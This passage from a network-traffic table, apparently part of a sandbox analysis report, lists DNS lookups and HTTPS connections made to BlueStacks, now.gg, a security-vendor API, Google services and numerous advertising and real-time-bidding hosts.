| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| GB | 18.245.143.83:443 | tags.crwdcntrl.net | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| GB | 18.245.143.83:443 | tags.crwdcntrl.net | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.253.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.239.48.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.168.78.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.143.245.18.in-addr.arpa | udp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 7e84fa503e0a0177c37461334c82ed65.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 1x1.a-mo.net | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| GB | 172.217.169.65:443 | 7e84fa503e0a0177c37461334c82ed65.safeframe.googlesyndication.com | tcp |
| DE | 3.67.143.30:443 | 1x1.a-mo.net | tcp |
| IE | 54.229.28.67:443 | bcp.crwdcntrl.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| DE | 3.67.143.30:443 | 1x1.a-mo.net | tcp |
| GB | 172.217.169.65:443 | 7e84fa503e0a0177c37461334c82ed65.safeframe.googlesyndication.com | tcp |
| IE | 54.229.28.67:443 | bcp.crwdcntrl.net | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| NL | 185.235.87.44:443 | gem.gbc.criteo.com | tcp |
| NL | 185.235.87.150:443 | ag.gbc.criteo.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | 67.28.229.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.143.67.3.in-addr.arpa | udp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 104.26.9.212:443 | www.elevenforum.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.153:443 | ib.adnxs.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| DE | 3.67.143.30:443 | 1x1.a-mo.net | tcp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| BE | 23.14.90.89:443 | m.media-amazon.com | tcp |
| BE | 23.14.90.89:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | ts.amazon-adsystem.com | udp |
| GB | 18.245.218.63:443 | ts.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aan.amazon.co.uk | udp |
| IE | 3.254.237.161:443 | aan.amazon.co.uk | tcp |
| IE | 3.254.237.161:443 | aan.amazon.co.uk | tcp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| IE | 3.254.237.161:443 | aan.amazon.co.uk | tcp |
| GB | 54.192.137.102:443 | s2.paa-reporting-advertising.amazon | tcp |
| IE | 3.254.237.161:443 | aan.amazon.co.uk | tcp |
| IE | 3.254.237.161:443 | aan.amazon.co.uk | tcp |
| US | 8.8.8.8:53 | 89.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.218.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.237.254.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sq-tungsten-ts-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | udp |
| IE | 3.254.239.147:443 | sq-tungsten-ts-eu.amazon-adsystem.com | tcp |
| GB | 108.156.39.62:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 8.8.8.8:53 | 147.239.254.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 52.94.222.140:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 140.222.94.52.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | cloud.bluestacks.com | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | bsxplayerv16.bluestacks.com | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | x-api.bluestacks.com | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| GB | 79.133.176.222:443 | x-api.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | ak-build.bluestacks.com | udp |
| US | 8.8.8.8:53 | web3-games.now.gg | udp |
| US | 8.8.8.8:53 | bsxplayerv16.bluestacks.com | udp |
| US | 2.20.12.92:443 | ak-build.bluestacks.com | tcp |
| GB | 18.165.201.53:443 | web3-games.now.gg | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| GB | 79.133.176.222:443 | bsxplayerv16.bluestacks.com | tcp |
| GB | 79.133.176.225:443 | bsxplayerv16.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 188.98.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.201.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bst-launcher-sgp.bluestacks.cn | udp |
| GB | 79.133.176.224:443 | bst-launcher-sgp.bluestacks.cn | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | 224.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wallet.now.gg | udp |
| US | 34.96.124.47:443 | wallet.now.gg | tcp |
| US | 8.8.8.8:53 | crypto-blockchain-cdn.now.gg | udp |
| US | 8.8.8.8:53 | cloud.bluestacks.com | udp |
| US | 2.20.12.72:443 | crypto-blockchain-cdn.now.gg | tcp |
| US | 2.20.12.72:443 | crypto-blockchain-cdn.now.gg | tcp |
| US | 2.20.12.72:443 | crypto-blockchain-cdn.now.gg | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | now.gg | udp |
| GB | 18.244.114.96:443 | now.gg | tcp |
| IE | 52.94.222.140:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 2.20.12.72:443 | crypto-blockchain-cdn.now.gg | tcp |
| US | 2.20.12.72:443 | crypto-blockchain-cdn.now.gg | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| GB | 18.165.201.53:443 | web3-games.now.gg | tcp |
| US | 8.8.8.8:53 | cdn-icon.bluestacks.com | udp |
| US | 2.19.252.134:443 | cdn-icon.bluestacks.com | tcp |
| US | 2.19.252.134:443 | cdn-icon.bluestacks.com | tcp |
| US | 2.19.252.134:443 | cdn-icon.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 72.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.114.244.18.in-addr.arpa | udp |
| US | 2.19.252.134:443 | cdn-icon.bluestacks.com | tcp |
| US | 8.8.8.8:53 | s2.coinmarketcap.com | udp |
| GB | 18.239.236.114:443 | s2.coinmarketcap.com | tcp |
| US | 8.8.8.8:53 | 737586090-files.gitbook.io | udp |
| US | 8.8.8.8:53 | cdn-bgp.bluestacks.com | udp |
| US | 2.19.252.134:443 | cdn-icon.bluestacks.com | tcp |
| US | 172.64.147.209:443 | 737586090-files.gitbook.io | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 114.236.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.147.64.172.in-addr.arpa | udp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | 1383595251-files.gitbook.io | udp |
| US | 8.8.8.8:53 | 159.188.101.151.in-addr.arpa | udp |
| US | 2.20.12.92:443 | ak-build.bluestacks.com | tcp |
| US | 2.20.12.92:443 | ak-build.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | cdn-bgp.bluestacks.com | udp |
| US | 2.20.12.81:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.81:443 | cdn-bgp.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 81.12.20.2.in-addr.arpa | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 2.20.12.81:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.81:443 | cdn-bgp.bluestacks.com | tcp |
| US | 2.20.12.81:443 | cdn-bgp.bluestacks.com | tcp |
| US | 8.8.8.8:53 | cdn.now.gg | udp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 8.8.8.8:53 | 77.12.20.2.in-addr.arpa | udp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| NL | 185.89.210.153:443 | ib.adnxs.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| US | 8.8.8.8:53 | app-page-details-prod.bstkinternal.net | udp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 34.111.56.14:443 | app-page-details-prod.bstkinternal.net | tcp |
| US | 34.111.56.14:443 | app-page-details-prod.bstkinternal.net | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | cdn-www.bluestacks.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 2.20.12.91:443 | cdn-www.bluestacks.com | tcp |
| US | 2.20.12.91:443 | cdn-www.bluestacks.com | tcp |
| US | 2.20.12.91:443 | cdn-www.bluestacks.com | tcp |
| US | 2.20.12.91:443 | cdn-www.bluestacks.com | tcp |
| US | 2.20.12.91:443 | cdn-www.bluestacks.com | tcp |
| US | 2.20.12.91:443 | cdn-www.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 14.56.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-icon.bluestacks.com | udp |
| US | 2.19.252.135:443 | cdn-icon.bluestacks.com | tcp |
| US | 2.19.252.135:443 | cdn-icon.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 91.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.252.19.2.in-addr.arpa | udp |
| US | 2.19.252.135:443 | cdn-icon.bluestacks.com | tcp |
| US | 2.19.252.135:443 | cdn-icon.bluestacks.com | tcp |
| US | 2.19.252.135:443 | cdn-icon.bluestacks.com | tcp |
| US | 2.19.252.135:443 | cdn-icon.bluestacks.com | tcp |
| US | 8.8.8.8:53 | cdn.fuseplatform.net | udp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| IE | 52.94.222.140:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 52.94.222.140:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | report1.smartgaga.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 172.217.169.6:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 216.58.212.246:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 6.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 2.20.12.72:443 | crypto-blockchain-cdn.now.gg | tcp |
| US | 2.20.12.92:443 | ak-build.bluestacks.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| GB | 79.133.176.225:443 | bst-launcher-sgp.bluestacks.cn | tcp |
| GB | 79.133.176.211:443 | bst-launcher-sgp.bluestacks.cn | tcp |
| US | 8.8.8.8:53 | cdn.now.gg | udp |
| US | 2.20.12.88:443 | cdn.now.gg | tcp |
| US | 2.20.12.88:443 | cdn.now.gg | tcp |
| US | 2.20.12.88:443 | cdn.now.gg | tcp |
| US | 2.20.12.88:443 | cdn.now.gg | tcp |
| US | 8.8.8.8:53 | 88.12.20.2.in-addr.arpa | udp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | g2.gumgum.com | udp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| US | 8.8.8.8:53 | 212.210.89.185.in-addr.arpa | udp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| US | 2.20.12.77:443 | cdn.now.gg | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| NL | 89.149.193.113:443 | prg-apac.smartadserver.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| IE | 52.48.239.33:443 | g2.gumgum.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | cdn.fuseplatform.net | udp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | prg-apac.smartadserver.com | udp |
| US | 8.8.8.8:53 | g2.gumgum.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| NL | 81.17.55.160:443 | prg-apac.smartadserver.com | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| IE | 52.208.44.24:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | 160.55.17.81.in-addr.arpa | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| NL | 81.17.55.160:443 | prg-apac.smartadserver.com | tcp |
| BE | 23.14.90.90:443 | cdn.fuseplatform.net | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 172.217.16.251:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 251.16.217.172.in-addr.arpa | udp |
| US | 104.22.0.235:443 | api.reasonsecurity.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| US | 104.22.54.206:443 | i.connectad.io | tcp |
| NL | 81.17.55.160:443 | prg-apac.smartadserver.com | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| DE | 3.78.168.176:443 | tlx.3lift.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| IE | 52.208.44.24:443 | g2.gumgum.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
